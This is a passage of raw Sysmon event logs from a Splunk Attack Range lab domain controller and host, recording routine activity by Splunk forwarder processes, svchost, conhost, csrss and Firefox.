Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.315{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1783-6216-2C07-000000003802}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.311{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.310{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.310{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.310{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.310{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1783-6216-2C07-000000003802}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.309{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1783-6216-2C07-000000003802}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.308{C8EA50B7-1783-6216-2C07-000000003802}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.814{C8EA50B7-1784-6216-2E07-000000003802}61162292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8E1E1378E9218D45B886E0FBCD8CAA,SHA256=9D5D357CF368625FD36F3D7BC0EBC7449854D9ADF53E0A9E0D315F8E829708C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:20.376{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB24E2DB2257A797EA583AF16145E3B,SHA256=8ABF0488B46D07C8A704C849F94C299BB57A80432A041012057919770036C3DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1784-6216-2E07-000000003802}6116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1784-6216-2E07-000000003802}6116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.577{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1784-6216-2E07-000000003802}6116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.578{C8EA50B7-1784-6216-2E07-000000003802}6116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.102{C8EA50B7-1783-6216-2D07-000000003802}6420376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:21.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B84E6160B7AC5FA001E741BF67DE68B,SHA256=3885BFD50B1E7C13965AE5B7CD2E8177963A3D6478C79D770A661F8E8B48287E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.899{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=8ACB65E321ADDB677230E615A7B9824C,SHA256=D6B3A5738029AE7D2B395F4021D17FB1174FEFD4B99ABB4CF835CB079D12E3C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8711F0AED5BD0CB63619F1E300274A39,SHA256=3C6943ACB4761F443B799888FC7C47BE39DF5DD26442555888B9F051E16F76BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1785-6216-2F07-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1785-6216-2F07-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.076{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1785-6216-2F07-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 